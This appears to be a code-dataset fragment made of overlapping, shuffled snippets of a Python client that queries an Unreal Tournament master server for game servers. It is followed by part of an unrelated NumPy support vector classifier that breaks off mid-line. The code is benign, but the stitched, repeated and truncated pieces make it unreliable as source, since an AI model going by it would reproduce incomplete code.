"the Master Server you'd wish to poll. port (int): The port number the",
"if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def",
"5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout)",
"{server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key, val in server.info.items()",
"or IP address for the Master Server you'd wish to poll. port (int):",
"Quake style queries to end clients (whether they be Master Servers # or",
"the search query to look for in the dictionary keys Returns: A list",
"Server you'd wish to poll. port (int): The port number the master server",
"dict keys. Args: query (str): the search query to look for in the",
"The Quake style queries to end clients (whether they be Master Servers #",
"socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server",
"not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.'",
"Concurrently poll all servers captured from the Master Server and capture info and",
"+= msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data =",
"0: break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data",
"= [] if 'logger' not in kwargs: self.logger = logger else: self.logger =",
"msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout",
"self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for",
"received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) )",
"'logger' not in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout'",
"int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\"",
".unrealserver import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class",
"socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master",
"= b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg",
"DNS name or IP address for the Master Server you'd wish to poll.",
"raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append(",
"capture info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor()",
"self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers for keyword \\'{query}\\'.' )",
"the values in the server dict keys. Args: query (str): the search query",
"'timeout' not in kwargs: self.timeout = 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs:",
"Args: hostname (str): Resolvable DNS name or IP address for the Master Server",
"\"\"\" # The Quake style queries to end clients (whether they be Master",
"from the Master Server and capture info and status headers. Returns: None \"\"\"",
"logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer",
"break fullmsg += msg.decode('utf-8') except socket.timeout as e: raise e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}')",
"server clients), need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug(",
"f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for a given",
"hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable",
"query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server) return return_list def poll_now(self): \"\"\"",
"in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if 'timeout' not in",
"import re import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer #",
"4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' )",
"query (str): the search query to look for in the dictionary keys Returns:",
"pformat from .unrealserver import UnrealServer # Setup Logger import logging logger = logging.getLogger(__name__)",
"bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command,",
"server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for",
"import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port,",
"return_list def poll_now(self): \"\"\" Concurrently poll all servers captured from the Master Server",
"= [ key for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE",
"Server and capture info and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server()",
"{len(self.servers)} servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for",
"get_servers(self): \"\"\" Poll the Master Server for a client list and sets the",
"for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key",
"data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info(",
"self.port) def get_servers(self): \"\"\" Poll the Master Server for a client list and",
"in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results = [ key for key,",
"__init__( self, hostname, port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname",
"a client list and sets the class attribute of 'servers' to a list",
"of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}'",
"self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True: msg = self.sock.recv(4096) if",
"\"\"\" Search for a given query in any of the values in the",
"query in any of the values in the server dict keys. Args: query",
"be Master Servers # or server clients), need a header of 4 \\xFF",
") def search_servers(self, query): \"\"\" Search for a given query in any of",
"**kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name",
"command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while",
"self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for a",
"list of Servers \"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching",
"Args: query (str): the search query to look for in the dictionary keys",
"= (self.hostname, self.port) def get_servers(self): \"\"\" Poll the Master Server for a client",
"in the dictionary keys Returns: A list of Servers \"\"\" if not self.servers:",
"port (int): The port number the master server is listening on \"\"\" self.hostname",
"fullmsg = '' try: while True: msg = self.sock.recv(4096) if len(msg) <= 0:",
"header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to",
"Master Server you'd wish to poll. port (int): The port number the master",
"self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except socket.timeout as e:",
"re import concurrent.futures from pprint import pformat from .unrealserver import UnrealServer # Setup",
"need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command",
"self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout = 5 else: self.timeout",
"of 'servers' to a list of Server objects. Returns: None \"\"\" # The",
"master server is listening on \"\"\" self.hostname = hostname self.port = port self.servers",
"# The Quake style queries to end clients (whether they be Master Servers",
"self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = ''",
"Master Server and capture info and status headers. Returns: None \"\"\" def get_server_info(server):",
"# Setup Logger import logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__(",
"query to look for in the dictionary keys Returns: A list of Servers",
"(whether they be Master Servers # or server clients), need a header of",
"to poll. port (int): The port number the master server is listening on",
"e self.logger.debug(f'Raw data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0],",
"= 5 else: self.timeout = kwargs['timeout'] self.logger.debug(f'Passed kwargs: {kwargs}') self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)",
"logging logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs,",
"): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS name or",
"def get_servers(self): \"\"\" Poll the Master Server for a client list and sets",
"Master Server for a client list and sets the class attribute of 'servers'",
"data received:\\n\\n{fullmsg}') data = fullmsg.split('\\\\')[5:] for item in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger)",
"val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if info_results: return_list.append(server)",
") self.logger.info( f'Found {len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for",
"given query in any of the values in the server dict keys. Args:",
"attribute of 'servers' to a list of Server objects. Returns: None \"\"\" #",
"a given query in any of the values in the server dict keys.",
"True: msg = self.sock.recv(4096) if len(msg) <= 0: break fullmsg += msg.decode('utf-8') except",
"and status headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as executor:",
"listening on \"\"\" self.hostname = hostname self.port = port self.servers = [] if",
"logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) class UnrealMasterServer(object): def __init__( self, hostname, port, **kwargs, ):",
"{len(self.servers)} servers running.' ) def search_servers(self, query): \"\"\" Search for a given query",
"[] if 'logger' not in kwargs: self.logger = logger else: self.logger = kwargs['logger']",
"import socket import re import concurrent.futures from pprint import pformat from .unrealserver import",
"headers. Returns: None \"\"\" def get_server_info(server): server.poll_server() with concurrent.futures.ThreadPoolExecutor() as executor: executor.map(get_server_info, self.servers)",
"= logger else: self.logger = kwargs['logger'] if 'timeout' not in kwargs: self.timeout =",
"or server clients), need a header of 4 \\xFF bytes command = b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\"",
"end clients (whether they be Master Servers # or server clients), need a",
"info_results = [ key for key, val in server.info.items() if re.search( query, str(val),",
"Server for a client list and sets the class attribute of 'servers' to",
"self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.server = (self.hostname, self.port) def get_servers(self): \"\"\" Poll",
"\\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg = '' try: while True:",
"port number the master server is listening on \"\"\" self.hostname = hostname self.port",
"in data[1::2][:-1]: self.servers.append( UnrealServer(item.split(':')[0], int(item.split(':')[1]), logger=self.logger) ) self.logger.info( f'Found {len(self.servers)} servers running.' )",
"poll_now(self): \"\"\" Concurrently poll all servers captured from the Master Server and capture",
"servers for keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\")",
"on \"\"\" self.hostname = hostname self.port = port self.servers = [] if 'logger'",
"b\"\\\\list\\\\gamename\\\\ut\\\\final\\\\\" self.logger.debug( f'Sending command \\'\\\\{command}\\\\\\' to {self.hostname}:{self.port}' ) self.sock.connect(self.server) self.sock.sendto(command, self.server) fullmsg =",
"port, **kwargs, ): \"\"\" UnrealMasterServer class init statement Args: hostname (str): Resolvable DNS",
"keyword \\'{query}\\'.' ) for server in self.servers: self.logger.info(f\"Scanning {server} for keyword.\") self.logger.debug(f\"{pformat(server.info)}\") info_results",
"Servers \"\"\" if not self.servers: return return_list = [] self.logger.info( f'Searching {len(self.servers)} servers",
"for key, val in server.info.items() if re.search( query, str(val), re.IGNORECASE ) ] if",
"if 'logger' not in kwargs: self.logger = logger else: self.logger = kwargs['logger'] if",
"poll all servers captured from the Master Server and capture info and status"
] |
[
"\"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids,",
"= os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges():",
"= os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options =",
"yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\":",
"Neo4j.\"\"\" # pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible",
"os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test",
"[ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope',",
"do pytest fixtures import json import os import pytest from .setup.neo4j_ import get_edge_properties,",
"'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\"",
"edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options =",
"the incredible way we do pytest fixtures import json import os import pytest",
"import json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL =",
"fixtures import json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL",
"== edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = {",
"= { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids",
"= { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id",
"because of the incredible way we do pytest fixtures import json import os",
"stuff happens because of the incredible way we do pytest fixtures import json",
"NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError):",
"1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\"",
"edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id']",
"\"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": {",
"**options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking",
"'18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id",
"{ \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id =",
"= [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737',",
"def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL,",
"= os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from",
"\"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges =",
"incredible way we do pytest fixtures import json import os import pytest from",
"'18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ]",
"NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def",
"\"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484'",
"assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options",
"}, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids",
"os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the",
"\"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [",
"test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\":",
"json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL',",
"way we do pytest fixtures import json import os import pytest from .setup.neo4j_",
"this stuff happens because of the incredible way we do pytest fixtures import",
"\"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with",
"yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\":",
"get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>')",
"\"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": {",
"<PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) ==",
"get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test",
"options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, }",
"'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking",
"NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges",
"'<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\":",
"KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, },",
"the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>,",
"{ \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ]",
"'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with",
"def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL,",
"get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD',",
"import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD =",
"\"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges)",
"with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with pytest.raises(RuntimeError): get_node_properties(node_ids,",
"NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484',",
"NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges",
"we do pytest fixtures import json import os import pytest from .setup.neo4j_ import",
"= '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] ==",
"happens because of the incredible way we do pytest fixtures import json import",
"edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the KG.\"\"\" options = { \"url\":",
"\"\"\"Test Neo4j.\"\"\" # pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the",
"# pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible way",
"NEO4J_PASSWORD = os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options",
"import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474')",
"os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER",
"edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [",
"import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER =",
"== 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from the",
"edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER,",
"^^^ this stuff happens because of the incredible way we do pytest fixtures",
"test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\":",
"\"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options)",
"edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def",
"\"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids = [ '18557484', 'nope',",
"} edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids =",
"disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible way we do",
"nodes/edges from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER,",
"] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with pytest.raises(RuntimeError):",
"} edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1 assert",
"= get_edge_properties([edge_id], **options) assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank():",
"pytest fixtures import json import os import pytest from .setup.neo4j_ import get_edge_properties, get_node_properties",
".setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j') NEO4J_PASSWORD",
"NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert",
"# ^^^ this stuff happens because of the incredible way we do pytest",
"{ \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_id = '18557484' edges = get_edge_properties([edge_id],",
"from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER', 'neo4j')",
"pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options) node_ids = [ 'MONDO:0005737', 'nope', ] with pytest.raises(RuntimeError): get_node_properties(node_ids, **options)",
"pylint: disable=redefined-outer-name,no-name-in-module,unused-import # ^^^ this stuff happens because of the incredible way we",
"{ \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\": <PASSWORD>, }, } edge_ids =",
"from the KG.\"\"\" options = { \"url\": NEO4J_URL, \"credentials\": { \"username\": NEO4J_USER, \"password\":",
"of the incredible way we do pytest fixtures import json import os import",
"len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges from",
"pytest from .setup.neo4j_ import get_edge_properties, get_node_properties NEO4J_URL = os.environ.get('NEO4J_URL', 'http://localhost:7474') NEO4J_USER = os.environ.get('NEO4J_USER',",
"assert len(edges) == 1 assert edges[0]['id'] == edge_id def test_fail_yank(): \"\"\"Test yanking nodes/edges",
"<PASSWORD>, }, } edge_ids = [ '18557484', 'nope', ] with pytest.raises(RuntimeError): get_edge_properties(edge_ids, **options)",
"os.environ.get('NEO4J_PASSWORD', '<PASSWORD>') def test_yank_edges(): \"\"\"Test yanking edges from the KG.\"\"\" options = {",
"}, } edge_id = '18557484' edges = get_edge_properties([edge_id], **options) assert len(edges) == 1"
] |
[
"<gh_stars>0 #!/usr/bin/env python3 \"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello",
"\"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.') logging.debug(f\"Printed 'Hello",
"python3 \"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.') logging.debug(f\"Printed",
"#!/usr/bin/env python3 \"\"\" Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.')",
"Print Hello World.\"\"\" import logging def hello_world(name='World', **kwargs): print(f'Hello {name}.') logging.debug(f\"Printed 'Hello {name}.'\")"
] |
[
"np.ones(len(t)) else: a = np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X)",
": float update ratio of the lagrange multiplier decay_step : int number of",
"decision boundary and its support vectors Parameters ---------- X : (sample_size, n_features) ndarray",
"0, self.C, out=a) mask = a > 0 self.X = X[mask] self.t =",
"t[:, None] * Gram while True: for i in range(decay_step): grad = 1",
"self.distance(x) label = np.sign(y) return label def distance(self, x): \"\"\" calculate distance from",
"if X.ndim == 1: X = X[:, None] assert X.ndim == 2 assert",
"t2 = np.sum(np.square(t)) if self.C == np.Inf: a = np.ones(len(t)) else: a =",
"the boundary \"\"\" if X.ndim == 1: X = X[:, None] assert X.ndim",
"self.C, out=a) mask = a > 0 self.X = X[mask] self.t = t[mask]",
"penalty of misclassification \"\"\" self.kernel = kernel self.C = C def fit(self, X,",
"n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y",
"np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters",
"@ t) * t / t2 np.clip(a, 0, self.C, out=a) mask = a",
"decay min_lr : float minimum value of learning rate Attributes ---------- a :",
"input Returns ------- distance : (sample_size,) ndarray distance from the boundary \"\"\" distance",
"boundary \"\"\" distance = np.sum( self.a * self.t * self.kernel(x, self.X), axis=-1) +",
"its support vectors Parameters ---------- X : (sample_size, n_features) ndarray input data t",
"x : (sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance",
"* grad a -= (a @ t) * t / t2 np.clip(a, 0,",
"labels of the input Parameters ---------- x : (sample_size, n_features) ndarray input Returns",
"---------- x : (sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray",
"vectors Parameters ---------- X : (sample_size, n_features) ndarray input data t : (sample_size,)",
"ndarray input Returns ------- distance : (sample_size,) ndarray distance from the boundary \"\"\"",
"= a[mask] self.b = np.mean( self.t - np.sum( self.a * self.t * self.kernel(self.X,",
"for i in range(decay_step): grad = 1 - H @ a a +=",
"self.a * self.t * self.kernel(self.X, self.X), axis=-1)) if self.C == np.Inf: if np.allclose(self.distance(self.X)",
"self.X)) @ self.a) def predict(self, x): \"\"\" predict labels of the input Parameters",
"ndarray input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y =",
"support vectors Parameters ---------- X : (sample_size, n_features) ndarray input data t :",
"(sample_size, n_features) ndarray input Returns ------- distance : (sample_size,) ndarray distance from the",
"b : float bias parameter support_vector : (n_vector, n_features) ndarray support vectors of",
"class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct support vector classifier Parameters ----------",
"input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\" y = self.distance(x)",
"<gh_stars>1-10 import numpy as np class SupportVectorClassifier(object): def __init__(self, kernel, C=np.Inf): \"\"\" construct",
"def distance(self, x): \"\"\" calculate distance from the decision boundary Parameters ---------- x",
"range(decay_step): grad = 1 - H @ a a += lr * grad",
"(sample_size, n_features) ndarray input Returns ------- label : (sample_size,) ndarray predicted labels \"\"\"",
"ndarray corresponding labels 1 or -1 learning_rate : float update ratio of the",
"np.zeros(len(t)) + self.C / 10 Gram = self.kernel(X, X) H = t *",
"the lagrange multiplier decay_step : int number of iterations till decay decay_rate :",
": (sample_size,) ndarray corresponding labels 1 or -1 learning_rate : float update ratio",
"decay_rate=0.9, min_lr=1e-5): \"\"\" estimate decision boundary and its support vectors Parameters ---------- X",
"= np.sign(y) return label def distance(self, x): \"\"\" calculate distance from the decision",
"np.all(np.greater_equal(1.01, self.distance(self.X) * self.t)): break if lr < min_lr: break lr *= decay_rate",
"minimum value of learning rate Attributes ---------- a : (sample_size,) ndarray lagrange multiplier",
"X.ndim == 2 assert t.ndim == 1 lr = learning_rate t2 = np.sum(np.square(t))",
